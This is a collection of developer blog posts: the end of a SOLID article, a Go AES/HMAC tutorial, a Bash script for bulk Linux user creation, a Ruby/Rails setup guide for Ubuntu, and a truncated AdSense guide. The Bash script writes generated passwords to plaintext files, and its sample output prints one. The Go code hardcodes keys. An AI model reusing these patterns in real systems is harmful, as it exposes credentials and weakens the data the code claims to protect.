return 'Faked data' } } const excelExporter = new ExcelExporter() const pdfExporter = new PdfExporter() const dataExporterExcel = new DataExporter(excelExporter) dataExporterExcel.export() const dataExporterPdf = new DataExporter(pdfExporter) dataExporterPdf.export() ``` It's important to note that the **_Dependency Inversion Principle_** differs from **_Dependency Injection_** because **_Dependency Inversion_** is a principle, while **_Dependency Injection_** is a design pattern. **_Dependency Injection_** is just one of the ways to implement **_Dependency Inversion_**. 
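Before the conclusion, it is worth circling back to the Liskov Substitution Principle example: in the violating code above, the `Square` returns an area of 25 where a `Rectangle` given the same calls returns 50, which is exactly the behavioural change LSP forbids. The article suggests introducing a common parent such as a `Shape` class; the sketch below is one possible refactor consistent with that suggestion (an illustrative assumption, not the only valid design):

```ts
abstract class Shape {
  abstract calculateArea(): number;
}

class Rectangle extends Shape {
  constructor(private width: number, private height: number) {
    super();
  }

  calculateArea(): number {
    return this.width * this.height;
  }
}

class Square extends Shape {
  constructor(private side: number) {
    super();
  }

  calculateArea(): number {
    return this.side * this.side;
  }
}

// Both shapes can be used wherever a Shape is expected, without surprises.
const shapes: Shape[] = [new Rectangle(10, 5), new Square(5)];
shapes.forEach(shape => console.log(shape.calculateArea())); // 50, 25
```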
Conclusion ---------- The 5 **SOLID** principles can be implemented in most object-oriented programming languages like Java, C#, TypeScript, JavaScript, Python, etc. **SOLID** provides a foundational framework that helps developers build source code that is easy to understand, flexible, easily extendable, enhances system maintainability, and minimizes the risk of issues. **_If you have any suggestions or questions regarding the content of the article, please don't hesitate to leave a comment below!_** **_If you found this content helpful, please visit [the original article on my blog](https://howtodevez.blogspot.com/2024/04/explanation-of-solid-in-oop.html) to support the author and explore more interesting content._** <a href="https://howtodevez.blogspot.com/2024/03/sitemap.html" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Blogger-FF5722?style=for-the-badge&logo=blogger&logoColor=white" width="36" height="36" alt="Blogspot" /></a><a href="https://dev.to/chauhoangminhnguyen" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/dev.to-0A0A0A?style=for-the-badge&logo=dev.to&logoColor=white" width="36" height="36" alt="Dev.to" /></a><a href="https://www.facebook.com/profile.php?id=61557154776384" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Facebook-1877F2?style=for-the-badge&logo=facebook&logoColor=white" width="36" height="36" alt="Facebook" /></a><a href="https://x.com/DavidNguyenSE" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/X-000000?style=for-the-badge&logo=x&logoColor=white" width="36" height="36" alt="X" /></a>
chauhoangminhnguyen
1,912,177
Implementing the Standard Symmetric Encryption Signature Method in Golang
What Is the Standard Symmetric Encryption Signature Method? So, here's the thing: this method is...
0
2024-07-05T03:39:08
https://dev.to/yogameleniawan/implementasi-metode-standard-symmetric-encryption-signature-pada-golang-2m5m
go
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xib7ktvnbrqfcl87y7eg.png) ### What Is the Standard Symmetric Encryption Signature Method? So, here's the thing: this method is a way of encrypting data so it stays safe and can't be read by anyone who doesn't have the decryption key. Imagine you have a diary that you lock with a padlock. Only the person holding the key can open and read your diary. #### Symmetric Encryption Symmetric encryption is like you and your friend (or your friend's friend, uh, whatever, haha); the point is that you both share one and the same key to open the padlock. That key is used to encrypt (lock) and decrypt (unlock) the data. So both you and your friend can lock and unlock the same data, as long as you have the key. #### Signature The signature here isn't a physical signature, it's more of a digital one. This signature ensures that the data being sent really came from you and that nobody altered the data along the way. So you can be confident that the data you receive is genuinely from its source and hasn't been tampered with. ### Why Use This Method? - Data Security: Of course you want your data safe from prying hands, right? With symmetric encryption, your data is encrypted and can only be opened by someone who has the key. - Data Integrity: With a signature, you can make sure the data you receive or send is authentic and hasn't been altered. So you don't have to worry about anyone cheating. - Efficiency: Symmetric encryption is usually faster than [Asymmetric Encryption](https://yogameleniawan.com/learning-media/mengenal-asymmetric-encryption-keamanan-data-tingkat-tinggi-dengan-golang-4b17) because its encryption and decryption process is simpler. ### Example Usage in Golang Now let's see how to use this method in Golang. #### Symmetric Encryption in Golang ```go package main import ( "crypto/aes" "crypto/cipher" "crypto/rand" "encoding/hex" "fmt" "io" ) func encrypt(key, text []byte) (string, error) { block, err := aes.NewCipher(key) if err != nil { return "", err } ciphertext := make([]byte, aes.BlockSize+len(text)) iv := ciphertext[:aes.BlockSize] if _, err := io.ReadFull(rand.Reader, iv); err != nil { return "", err } stream := cipher.NewCFBEncrypter(block, iv) stream.XORKeyStream(ciphertext[aes.BlockSize:], text) return fmt.Sprintf("%x", ciphertext), nil } func decrypt(key []byte, cryptoText string) (string, error) { ciphertext, _ := hex.DecodeString(cryptoText) block, err := aes.NewCipher(key) if err != nil { return "", err } if len(ciphertext) < aes.BlockSize { return "", fmt.Errorf("ciphertext too short") } iv := ciphertext[:aes.BlockSize] ciphertext = ciphertext[aes.BlockSize:] stream := cipher.NewCFBDecrypter(block, iv) stream.XORKeyStream(ciphertext, ciphertext) return string(ciphertext), nil } func main() { key := []byte("the-key-has-to-be-32-bytes-long!") plaintext := "hello, world!" 
ciphertext, err := encrypt(key, []byte(plaintext)) if err != nil { fmt.Println("Error encrypting:", err) return } fmt.Printf("Encrypted: %s\n", ciphertext) decryptedText, err := decrypt(key, ciphertext) if err != nil { fmt.Println("Error decrypting:", err) return } fmt.Printf("Decrypted: %s\n", decryptedText) } ``` #### Signature in Golang ```go package main import ( "crypto/hmac" "crypto/sha256" "encoding/hex" "fmt" ) func createHMAC(key, message []byte) string { mac := hmac.New(sha256.New, key) mac.Write(message) return hex.EncodeToString(mac.Sum(nil)) } func verifyHMAC(key, message []byte, signature string) bool { expectedMAC := createHMAC(key, message) return hmac.Equal([]byte(expectedMAC), []byte(signature)) } func main() { key := []byte("my-secret-key") message := []byte("important message") signature := createHMAC(key, message) fmt.Printf("Signature: %s\n", signature) isValid := verifyHMAC(key, message, signature) fmt.Printf("Is valid: %t\n", isValid) } ``` So, the Standard Symmetric Encryption Signature method is important for protecting the security and integrity of your data. With symmetric encryption you can encrypt data so it stays safe, and with a signature you can make sure the data you receive or send is authentic and unchanged. So be sure to use this method for anything that needs a high level of security. Sources: - [HMAC Go](https://pkg.go.dev/crypto/hmac) - [SHA256](https://pkg.go.dev/crypto/sha256)
yogameleniawan
1,912,176
Creating and Managing Users and Groups on Linux with Bash Scripts: An Efficient Guide 🚀🐧
Welcome to Linux user management! In a growing organization, manually managing user accounts and...
0
2024-07-05T03:38:01
https://dev.to/adeshile_osunkoya_4201f36/creating-and-managing-users-and-groups-on-linux-with-bash-scripts-an-efficient-guide-2pog
devops, cloudcomputing, ubuntu, bash
Welcome to Linux user management! In a growing organization, manually managing user accounts and groups can quickly become tedious and error-prone. To streamline this process and maintain security and productivity, automation is key. 🛠️💪 With a Bash script, you can automate the repetitive tasks of creating and managing users and groups, ensuring consistency and efficiency while saving countless hours and reducing the risk of errors. In this article, we’ll show you how to create a script to automate the user and group creation process, a common task for any SysOps engineer. Let's dive in and simplify your workflow! 🌟 ## **Prerequisites** 1. A Linux distribution such as Ubuntu running on a VM (VirtualBox), Docker, or an AWS EC2 instance. 2. Basic knowledge of Linux commands and Bash scripting. 3. Root privileges to execute the script. 4. Basic understanding of shell scripting and user management in Linux **Step 1: Create user file** Create a `.txt` file listing your users and the groups they should be added to. A simple, easy-to-read format is recommended. For this article, a sample file `users.txt` has been created and is formatted as `user;groups`. Example ``` Gabriel;sudo,dev,www-data Sultan;sudo Chelsea;dev,www-data ``` In the first line of the example above, `Gabriel` is the user and the groups are `sudo, dev, www-data`. **Step 2: Create script file** Open your code editor and create a file, e.g. `create_users.sh`; this can also be created in your root directory from your terminal by running: ``` touch create_users.sh ``` _NB: The script file created will handle the logic for the users and groups defined in_ **Step 1** **Step 3: Script implementation** First we need to check the administrative privileges of the user running the script: - The script begins with a shebang line and a check for root privileges to ensure the necessary permissions for user and group management. ``` #!/bin/bash if (( "$UID != 0" )) then echo "Error: script requires root privilege" exit 1 fi ``` **Shebang (#!/bin/bash)**: Indicates that the script should be run in the Bash shell. **Root Privileges Check**: Verifies if the script is executed by the root user. If not, it prints an error and exits. Then, the script processes input arguments and checks for the presence and type (`text/plain`) of the file containing user data. ``` # Save all arguments in an array ARGS=("$@") # Check whether no arguments are supplied if [ "$#" -eq 0 ]; then echo "No arguments supplied" exit 1 fi # Define a variable for the file FILE=${ARGS[0]} # Check if the file exists if [ ! -f "$FILE" ]; then echo "Error: File $FILE does not exist." exit 1 fi # Get the MIME type and check if it is text/plain file_type=$(file -b --mime-type "$FILE") if [[ "$file_type" != "text/plain" ]]; then echo "Error: required file type is not text/plain" exit 1 fi ``` **Argument Handling**: Captures script arguments and checks if any are provided. **File Existence Check**: Verifies if the specified file exists. **MIME Type Check**: Ensures the file is a plain text file. **Logging and Data Writing Functions** I used the functions below to log all user actions into `/var/log/user_management.log` and to save user data. ``` # Logging and writing data log() { sudo printf "$*\n" >> $log_path } # Function to save user data user_data() { sudo printf "$1,$2\n" >> $3 } ``` **Generate Random Passwords** The `genpasswd` function is used to generate a secure random password of a specified length (default 16 characters) for the user. 
``` genpasswd() { local l=$1 [ "$l" == "" ] && l=16 tr -dc A-Za-z0-9_ < /dev/urandom | head -c ${l} | xargs } ``` **Process Each Line in the users.txt file:** The code block below reads each line of the `users.txt` file and gets the `username` and user groups. ``` # Create user function create_user(){ username="$1" password=$(genpasswd) # If username exists, do nothing if [ ! $(cat /etc/passwd | grep -w $username) ]; then # User is created with a group as their name sudo useradd -m -s /bin/bash $username # Set the user's password echo "$username:$password" | sudo chpasswd msg="User '$username' created with the password '********'" echo $msg log $msg # Save user data dir=/home/$username/$user_pass create_file_directory $dir user_data $username $password $dir # Set file group to user and give read only access sudo chgrp $username $dir sudo chmod 640 $dir fi } create_group() { # Create group # If group exists, do nothing if [ ! $(cat /etc/group | grep -w $1) ]; then sudo groupadd $1 msg="Group created '$1'" echo $msg log $msg fi } # Add user to group add_user_to_group() { sudo usermod -aG $2 $1 msg="'$1' added to '$2'" echo $msg log $msg } ``` The code block above contains the following functions: `create_user` function: Creates a user with a home directory and sets the password. `create_group` function: Creates a group if it doesn’t already exist. `add_user_to_group` function: Adds a user to a specified group. The user and password are created, and the details are then stored in the user's directory at the following path: `[user home directory]/var/secure/user_passwords.txt`. The script then reads the input file and creates the users and groups accordingly. ``` # Read the FILE while IFS= read -r line || [ -n "$line" ]; do username=$(printf "%s" "$line" | cut -d ';' -f 1) echo "----- Process started for: '$username' -----" create_user $username usergroups=$(printf "%s" "$line" | cut -d ';' -f 2) for group in ${usergroups//,/ } ; do create_group $group add_user_to_group $username $group done echo "----- Process Done with '$username' -----" done < $FILE ``` **Step 4: Run the script file** It's time to test our script and make sure the code works. Run the script against the `.txt` file using the command below in your terminal. 
``` bash create_users.sh users.txt ``` The result below should be displayed: ``` File and path created: /var/log/user_management.log ----- Process started for: 'Gabriel' ----- User 'Gabriel' created with the password '********' File and path created: /home/Gabriel/var/secure/user_passwords.txt 'Gabriel' added to 'sudo' 'Gabriel' added to 'dev' 'Gabriel' added to 'www-data' ----- Process Done with 'Gabriel' ----- ----- Process started for: 'Sultan' ----- User 'Sultan' created with the password '********' File and path created: /home/Sultan/var/secure/user_passwords.txt 'Sultan' added to 'sudo' ----- Process Done with 'Sultan' ----- ----- Process started for: 'Chelsea' ----- User 'Chelsea' created with the password '********' File and path created: /home/Chelsea/var/secure/user_passwords.txt 'Chelsea' added to 'dev' 'Chelsea' added to 'www-data' ----- Process Done with 'Chelsea' ----- root@32cb601ed360:~# cat /home/Gabriel/var/secure/user_passwords.txt Gabriel,yDEoSe1RfzIwxmhk root@32cb601ed360:~# bash create.users.sh users.txt File and path created: /var/log/user_management.log ----- Process started for: 'Gabriel' ----- 'Gabriel' added to 'sudo' 'Gabriel' added to 'dev' 'Gabriel' added to 'www-data' ----- Process Done with 'Gabriel' ----- ----- Process started for: 'Sultan' ----- 'Sultan' added to 'sudo' ----- Process Done with 'Sultan' ----- ----- Process started for: 'Chelsea' ----- 'Chelsea' added to 'dev' 'Chelsea' added to 'www-data' ----- Process Done with 'Chelsea' ----- ``` **To see all groups created, run:** ``` sudo cat /etc/group ``` **To see all users and the groups they belong to, run:** ``` sudo cat /etc/passwd ``` My full code implementation can be found on GitHub: [Creating and Managing Users](https://github.com/Adeshile2/user-manage-bash) **HNG Internships** For more information about the HNG Internship, visit [HNG Internship](https://hng.tech/internship), and if you want to hire world-class freelancers and developers, check [HNG Hire](https://hng.tech/hire). Thanks for reading through. Please leave feedback so I can better serve my readers 😊 **Conclusion** This Bash script automates the process of creating and managing users and groups on a Linux system, making it easier to maintain consistency and security across your user base. By following this guide, you can efficiently manage user accounts and group memberships with minimal manual effort.
adeshile_osunkoya_4201f36
1,912,175
Ruby / Rails Setup: Ubuntu
This article describes how to set up a Ruby / Rails development environment on Ubuntu. It...
27,960
2024-07-05T03:36:24
https://dev.to/serradura/setup-para-ruby-rails-ubuntu-2ip8
beginners, ruby, rails, braziliandevs
This article describes how to set up a Ruby / Rails development environment on Ubuntu. It covers the installation of Visual Studio Code, asdf, Ruby, NodeJS, SQLite, Rails, and Ruby LSP (a plugin for VSCode). To follow this tutorial, just copy and paste the commands into the terminal. If you run into any problem, leave a comment and I will try to help you. 😊 If you prefer, you can watch the [video on YouTube](https://www.youtube.com/watch?v=GFyrnaNKwdQ) where I walk through the environment setup step by step. {% embed https://www.youtube.com/watch?v=GFyrnaNKwdQ %} ## Installing Visual Studio Code Visual Studio Code is a free source-code editor developed by Microsoft for Windows, Linux, and macOS. The commands below download and install Visual Studio Code on Ubuntu. They also configure the editor as the terminal's default. ```shell # Update the package list with the latest versions sudo apt update # Install wget to download Visual Studio Code sudo apt install -y wget # Download Visual Studio Code to the Downloads folder ## -- https://code.visualstudio.com/download wget https://code.visualstudio.com/sha/download\?build\=stable\&os\=linux-deb-x64 -O ~/Downloads/code.deb # Install Visual Studio Code sudo dpkg -i ~/Downloads/code.deb # Set Visual Studio Code as the terminal's default editor echo 'export EDITOR="code --wait"' >> ~/.bashrc ``` ## Installing asdf asdf is a manager for tools and their different versions. It lets you install, manage, and switch between multiple versions of Ruby, NodeJS, and other programs and programming languages. Run the commands below to install it. ```sh # Install Git and Curl sudo apt install -y curl git # Install asdf # -- https://asdf-vm.com/guide/getting-started.html#_2-download-asdf git clone https://github.com/asdf-vm/asdf.git ~/.asdf --branch v0.14.0 # Configure asdf to load in the terminal echo '. "$HOME/.asdf/asdf.sh"' >> ~/.bashrc # Configure asdf autocompletion echo '. "$HOME/.asdf/completions/asdf.bash"' >> ~/.bashrc # Reload the terminal . ~/.bashrc ``` ## Installing Ruby Ruby is the programming language used by the Ruby on Rails framework. The commands below install the latest version of Ruby and set it as the system default. ```sh # Install the build dependencies # -- https://github.com/rbenv/ruby-build/wiki#ubuntudebianmint sudo apt install -y autoconf patch build-essential rustc libssl-dev libyaml-dev libreadline6-dev zlib1g-dev libgmp-dev libncurses5-dev libffi-dev libgdbm6 libgdbm-dev libdb-dev uuid-dev # Add the plugin to asdf asdf plugin add ruby # Install the latest version asdf install ruby latest:3 ``` After the installation, run the commands below to set the default Ruby version and update RubyGems (Ruby's library manager). ```sh # Check which version was installed asdf list ruby # You should see something like: # 3.3.3 # Set that version as the system default asdf global ruby 3.3.3 # Update RubyGems gem update --system # Check the default version ruby -v ``` ## Installing NodeJS NodeJS is a platform for developing applications in JavaScript. Node (or nodejs) is used by Rails to compile assets (such as CSS and JavaScript). The commands below install the latest version and set it as the system default. 
```sh # Install the build dependencies # -- https://github.com/nodejs/node/blob/main/BUILDING.md#building-nodejs-on-supported-platforms sudo apt install -y python3 g++ make python3-pip # Add the plugin to asdf asdf plugin add nodejs # Install the latest version asdf install nodejs latest # Check which version was installed asdf list nodejs # You should see something like: # 22.3.0 # Set that version as the system default asdf global nodejs 22.3.0 # Install yarn npm install -g yarn # Check the default version node -v ``` ## Installing SQLite SQLite is an embedded SQL database. In other words, it is a database that does not require a separate server, since everything is stored in a single file. ```sh sudo apt install -y sqlite3 ``` ## Installing Ruby LSP in Visual Studio Code Ruby LSP is a VSCode plugin that provides features such as autocompletion and formatting, among others, for both Ruby and Rails. ```sh # Install the Ruby LSP gem gem install ruby-lsp # Install the Ruby LSP extension in Visual Studio Code code --install-extension shopify.ruby-lsp ``` ## Installing Rails ```sh gem install rails # Check which version was installed rails -v ``` ## Creating a Rails project To test the Ruby and Rails installation, let's create a project and check that everything works. ```sh # Go to the home directory cd ~ # Create a folder to organize your projects mkdir Workspace # Enter the folder cd Workspace # Create a new Rails project # The default database is SQLite rails new myapp # Enter the project folder cd myapp # Create the database bin/rails db:create # Start the server bin/rails s ``` Open another terminal tab and run this command to open the application in the browser: ```sh open http://localhost:3000 ``` ### Creating a contact manager ```sh # Create a scaffold for the Person entity bin/rails g scaffold Person first_name last_name email birthdate:date # Run the migrations to create the table in the database bin/rails db:migrate # Start the server (if it is not already running) # bin/rails s # Open the contact manager in the browser open http://localhost:3000/people ``` Navigate through the system and try out the listing, creation, viewing, editing, and deletion of contacts. ### Improving the application's appearance To improve the system's look, let's add the class-less version of Pico CSS, which, as the name suggests, does not rely on CSS classes. In other words, just use plain HTML tags to get a nice, consistent style. ```sh # Inside the project folder cd ~/Workspace/myapp # Open VSCode code . ``` In VSCode, open the file `app/views/layouts/application.html.erb` (use `Ctrl` + `p` to search for the file) and add the following snippet inside the `<head>` tag: ```html <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@picocss/pico@2/css/pico.classless.min.css" /> ``` In the same file, wrap the contents of the `<body>` tag in a `<main>` tag: ```html <body> <main><%= yield %></main> </body> ``` After these changes, go back to the browser and reload to see the new look on every page of the system. ### Adding validations to the Person model Although functional, the contact manager has no validations. Let's add a few to ensure the submitted data is valid. 
In VSCode, open the file `app/models/person.rb` (use `Ctrl` + `p` to search for the file) and add the validations: ```ruby validates :first_name, :last_name, presence: true validates :email, format: /@/, allow_blank: true ``` Go back to the browser and try to create/edit a person without a name or with an e-mail that has no `@`. ## Conclusion See how simple it was to set up a Ruby / Rails development environment on Ubuntu? If you enjoyed it, check the references below for more information about each of the programs and languages used. Do you struggle with English? Check out this other post to learn [how to translate technical content in a practical way using Google Translator](https://serradura.github.io/pt-BR/blog/traduzindo_conteudo_tecnico_com_google_translator/). Did you like the content? Do you have another tip? Then leave your comment below. Thanks! 😉 > **Note**: This article was written based on Ubuntu 22.04. If you are using another version, the commands may not work correctly. If you run into any problem, leave a comment and I will try to help you. 😊 ## References: The list below contains the reference sites used to create this document. It follows the order in which they appear in the post. - [Visual Studio Code](https://code.visualstudio.com/) - [Asdf](https://asdf-vm.com/guide/getting-started.html) - [Ruby](https://www.ruby-lang.org/en/) ([Releases](https://www.ruby-lang.org/en/downloads/releases/)) - [NodeJS](https://nodejs.org/en/) - ([Releases](https://nodejs.org/en/download/releases/)) - [SQLite](https://www.sqlite.org/index.html) - [Ruby LSP](https://marketplace.visualstudio.com/items?itemName=Shopify.ruby-lsp) - [Ruby on Rails](https://rubyonrails.org/) - ([Getting Started](https://guides.rubyonrails.org/getting_started.html)) - [Pico CSS](https://picocss.com/) --- Have you heard of **ada.rb - Arquitetura e Design de Aplicações em Ruby** (Application Architecture and Design in Ruby)? It is a group focused on software engineering practices with Ruby. Join the <a href="https://t.me/ruby_arch_design_br" target="_blank">Telegram channel</a> and join us at our 100% online <a href="https://meetup.com/pt-BR/arquitetura-e-design-de-aplicacoes-ruby/" target="_blank">meetups</a>. ---
serradura
1,912,174
Enhance Your Pup's Style with a Tweed Dog Collar from Happy Dogs Togs
Are you looking to add a touch of elegance to your furry friend's wardrobe? Consider a tweed dog...
0
2024-07-05T03:34:33
https://dev.to/ericryan3132/enhance-your-pups-style-with-a-tweed-dog-collar-from-happy-dogs-togs-3g86
Are you looking to add a touch of elegance to your furry friend's wardrobe? Consider a [tweed dog collar](https://happydogstogs.com/collections/medium-harris-tweed-dog-collars) from Happy Dogs Togs! Tweed collars are not only stylish but also durable, making them a perfect choice for both fashion-conscious pet owners and those seeking long-lasting quality. Here's why a tweed dog collar might be the perfect accessory for your beloved canine companion. **Introduction to Tweed Dog Collars** Tweed dog collars offer a unique blend of sophistication and durability, inspired by classic British craftsmanship. They are crafted from high-quality tweed fabric, known for its resilience and timeless appeal. Whether you're walking through city streets or countryside trails, a tweed collar ensures your dog stands out with style and comfort. **Benefits of Tweed Collars** One of the key advantages of tweed dog collars is their durability. Designed to withstand daily wear and tear, they are ideal for active dogs who enjoy outdoor adventures. Additionally, tweed fabric is breathable, making it comfortable for your pet in all seasons. It's also easy to maintain, often requiring just a quick wipe-down to keep it looking pristine. **Style and Variety** At Happy Dogs Togs, you'll find a wide range of tweed collars to suit every dog's personality and size. From traditional earth tones to vibrant patterns, there's a collar to match every owner's taste and dog's unique character. Whether you prefer a classic houndstooth or a more contemporary checkered design, our collection ensures your pup looks effortlessly stylish. **Comfort and Functionality** Beyond style, tweed collars prioritize comfort and functionality. They are designed with your dog's comfort in mind, featuring soft inner linings and sturdy buckles for secure fastening. This ensures that your pet stays safe and comfortable during walks, training sessions, or playtime in the park. **Visit Happy Dogs Togs Today** Ready to upgrade your dog's wardrobe? Explore the exquisite collection of tweed dog collars at Happy Dogs Togs today. Whether you're treating your own dog or searching for the perfect gift for a fellow pet lover, our collars promise both style and durability. Visit our website to browse our full range and find the perfect tweed collar that complements your dog's personality and lifestyle.
ericryan3132
1,912,172
Online Linux Playground | Practice Linux Commands Online
Explore and experiment with Linux in a secure, cloud-based environment. Discover the power of Linux with our Online Linux Playground.
27,674
2024-07-05T03:23:31
https://labex.io/tutorials/linux-online-linux-playground-372915
linux, coding, programming, tutorial
## Introduction ![MindMap](https://internal-api-drive-stream.feishu.cn/space/api/box/stream/download/authcode/?code=OThlNmI3OWI4MzI2N2JjZWIwYmM1YmUwZThjMzgwYzNfOTMxNjJiMDIwZDYwOTBhNzQwNGQ0OWIzOTZlNTVlZWNfSUQ6NzM4Nzk4NzA4OTkzNjAwNzE3MV8xNzIwMTQ5ODEwOjE3MjAyMzYyMTBfVjM) This article covers the following tech skills: ![Skills Graph](https://pub-a9174e0db46b4ca9bcddfa593141f230.r2.dev/linux-online-linux-playground-372915.jpg) The LabEx Linux Playground is an online environment that allows users to quickly experience various Linux-related technologies. It provides a sandbox-like environment where users can explore and experiment with Linux without the need to set up a local machine. ## How to Use the Linux Playground The Linux Playground in LabEx runs on the Ubuntu 22.04 operating system. To get started, you can create a "Hello World" project to familiarize yourself with the Linux Playground experience. The LabEx Linux Playground offers three different user interfaces: 1. **VS Code**: Users can access the Linux environment through a web-based Visual Studio Code interface, allowing them to write, compile, and run code directly in the browser. 2. **Desktop**: The Linux Playground also provides a full-fledged desktop environment, similar to a traditional Linux desktop, where users can explore the file system, run commands, and use various applications. 3. **Web Terminal**: In addition to the graphical interfaces, the Linux Playground offers a web-based terminal, enabling users to interact with the Linux system using command-line tools and utilities. To create a "Hello World" project in the Linux Playground: 1. Choose your preferred user interface (VS Code, Desktop, or Web Terminal). 2. Open a text editor or the terminal and create a new file named "hello.c". 3. Inside the file, write the following "Hello World" program: ```c #include <stdio.h> int main() { printf("Hello, World!\n"); return 0; } ``` 4. Compile the program using the gcc compiler: `gcc hello.c -o hello`. 5. Run the compiled program: `./hello`. You should see the output "Hello, World!" displayed in the terminal or console. ![Linux Playground](https://file.labex.io/namespace/df87b950-1f37-4316-bc07-6537a1f2c481/playground/lab-linux-playground/assets/20240617-16-26-16-SNpkhTcO.png) ## Linux Skill Tree on LabEx The [Linux Skill Tree on LabEx](https://labex.io/skilltrees/linux) covers a wide range of essential Linux skills, organized into several skill groups. Here's a detailed overview: ### Basics Fundamental Linux concepts and commands: - **Navigation**: Basic commands for moving around the file system (e.g., `cd`, `ls`, `pwd`). - **File Management**: Commands for creating, copying, moving, and deleting files and directories (e.g., `touch`, `cp`, `mv`, `rm`, `mkdir`). - **Text Editing**: Using text editors like Vim or Nano to edit files. - **User Management**: Adding, modifying, and deleting user accounts. - **Permissions**: Understanding and managing file and directory permissions. - **Process Management**: Monitoring and controlling running processes (e.g., `ps`, `top`, `kill`). ### Shell Scripting Automating tasks with shell scripts: - **Bash Scripting**: Writing and executing Bash shell scripts. - **Variables and Input**: Handling variables and user input in scripts. - **Control Structures**: Implementing conditional statements and loops. - **Functions**: Defining and calling reusable script functions. - **Scripting Best Practices**: Organizing and optimizing shell scripts. 
### System Administration Tools and techniques for managing Linux systems: - **Package Management**: Installing, updating, and removing software packages (e.g., `apt`, `yum`, `dnf`). - **System Services**: Starting, stopping, and managing system services (e.g., `systemctl`, `init`). - **System Monitoring**: Monitoring system performance and resource utilization (e.g., `top`, `htop`, `sar`). - **Networking**: Configuring network interfaces and troubleshooting network issues. - **Backup and Restoration**: Implementing backup strategies and restoring data. - **Security**: Securing Linux systems, including user authentication and firewall configuration. ### Advanced Linux Specialized Linux skills and concepts: - **Shell Customization**: Personalizing the shell environment (e.g., `.bashrc`, aliases, functions). - **Linux Kernel**: Understanding the Linux kernel and its modules. - **Virtualization**: Setting up and managing virtual machines using tools like VirtualBox or KVM. - **Containerization**: Building and running Docker containers. - **Scripting Languages**: Utilizing scripting languages like Python or Perl for automation. - **Linux Distributions**: Exploring different Linux distributions and their unique features. ### Hands-on Labs Practical, interactive labs to reinforce your Linux skills: - **Lab Exercises**: Guided, step-by-step labs covering various Linux topics. - **Challenges**: Open-ended problems to test your problem-solving abilities. - **Projects**: Comprehensive projects to apply your Linux knowledge. For more detailed information and to start your Linux learning journey, visit the [Linux Skill Tree](https://labex.io/skilltrees/linux) on LabEx. ## Linux Playground FAQ ### What are the advantages of using Linux over other operating systems? Linux offers a high degree of customization, security, and stability, making it a popular choice for servers, embedded systems, and power users. Its open-source nature allows for extensive community support and a vast ecosystem of tools and applications. ### Why use an Online Linux Playground? An online Linux Playground provides a hassle-free way to explore and experiment with Linux without the need to set up a local Linux environment. It offers a ready-to-use platform to practice Linux commands, develop scripts, and test applications. ### How does the LabEx Linux Playground differ from other online Linux environments? The LabEx Linux Playground provides a comprehensive online lab environment with multiple interfaces (VS Code, Desktop, Web Terminal). It supports full-fledged development, including building and running Linux-based projects, as well as access to a wide range of Linux distributions and tools. ### Can I use the Linux Playground for professional development? Yes, the Linux Playground is equipped with professional-grade tools and environments, enabling you to work on complex Linux-based projects online, from system administration to software development. ### Is the Linux Playground suitable for beginners? Absolutely! The Linux Playground is designed to cater to both beginners and advanced users, offering an intuitive interface and comprehensive resources for learning and practicing Linux commands, scripting, and system administration. ## Summary The LabEx Linux Playground provides a convenient and accessible way for users to explore and experiment with Linux without the need to set up a local environment. 
With its three user interface options (VS Code, Desktop, and Web Terminal), users can choose the most suitable way to interact with the Linux system and quickly get started with various Linux-related tasks and projects. --- ## Want to learn more? - 🚀 Practice [Online Linux Playground](https://labex.io/tutorials/linux-online-linux-playground-372915) - 🌳 Learn the latest [Linux Skill Trees](https://labex.io/skilltrees/linux) - 📖 Read More [Linux Tutorials](https://labex.io/tutorials/category/linux) Join our [Discord](https://discord.gg/J6k3u69nU6) or tweet us [@WeAreLabEx](https://twitter.com/WeAreLabEx) ! 😄
labby
1,912,165
How to Get Google AdSense Approval: Tips, Tricks, and The Almighty Eligibility Checker
Ever wondered why Google AdSense seems harder to get into than an exclusive club in Miami? Well,...
0
2024-07-05T03:17:12
https://dev.to/developerbishwas/how-to-get-google-adsense-approval-tips-tricks-and-the-almighty-eligibility-checker-8kb
webdev, adsense, blogging
Ever wondered why Google AdSense seems harder to get into than an exclusive club in Miami? Well, folks, you're in luck! I'm going to spill the beans on how to get that coveted AdSense approval and introduce you to a lifesaving tool: [Adsense Eligibility Checker](https://webmatrices.com/adsense-eligibility-checker). ## The 101 on AdSense Approval First off, if you think AdSense approval is just about slapping some content onto a page and waiting for the money to roll in, you're in for a wake-up call. Google has a pretty strict checklist, and boy, do they stick to it! Here’s what you need to know: 1. **Quality Content**: Content is king, people! Google loves quality content that's unique, engaging, and useful. Posting about your cat's daily activities in excruciating detail? Maybe rethink that. 2. **Essential Pages**: Google wants to know you're serious. Make sure you have an "About Us," "Privacy Policy," "Contact Us," and "Terms of Service" page. 3. **Domain Age**: Your website should ideally be at least 6 months old. Google loves mature websites—kinda like how wine gets better with age. 4. **Website Traffic**: ‘No traffic, no money’ is the new ‘No pain, no gain’. Ensure you have steady traffic coming to your site. 5. **Mobile Friendly**: With almost everyone glued to their smartphones, it’s crucial your website is mobile-friendly. If it isn’t, you’re essentially toast. 6. **HTTPS**: Google is serious about security. If your website is still running on HTTP, it’s time to upgrade. It’s like wearing a helmet when you go biking—just do it! 7. **Good Website Speed**: Slow and steady doesn’t win the race here. Google wants fast-loading websites. Aim to get your pages loading in under 3 seconds. ## Introducing the Adsense Eligibility Checker Let’s face it, remembering all these criteria can feel like juggling flaming torches while balancing on a unicycle. This is where the [Adsense Eligibility Checker](https://webmatrices.com/adsense-eligibility-checker) comes into play. It’s like having a mini Sherlock Holmes analyze your website for you! ### Why Use It? - **Domain Age and Quality**: The tool checks if your domain meets the age and quality requirements, saving you the pain of guesswork. - **Scores**: You need a score of 70% or more to be in the safe zone. Anything less and you need to go back to the drawing board. - **Comprehensive Scanning**: It scans for all the important criteria: Domain Age, Domain Authority, Page Authority, Backlinks, Indexed Pages, and more. ### How to Use It? 1. **Step 1**: Enter your website URL. 2. **Step 2**: Click 'Check'. 3. **Step 3**: Get your score and a detailed breakdown of areas that need improvement. It’s pretty much like having that brutally honest friend who tells you when your outfit looks bad—only, this one actually helps! ## Quick Tips for Fast Approval ### 1. **Optimize Your Content** Ensure your content is well-written, grammatically pristine, and useful. No keyword stuffing. Google's AI has evolved—it now thinks! ### 2. **Improve Website Navigation** A cluttered website is like a 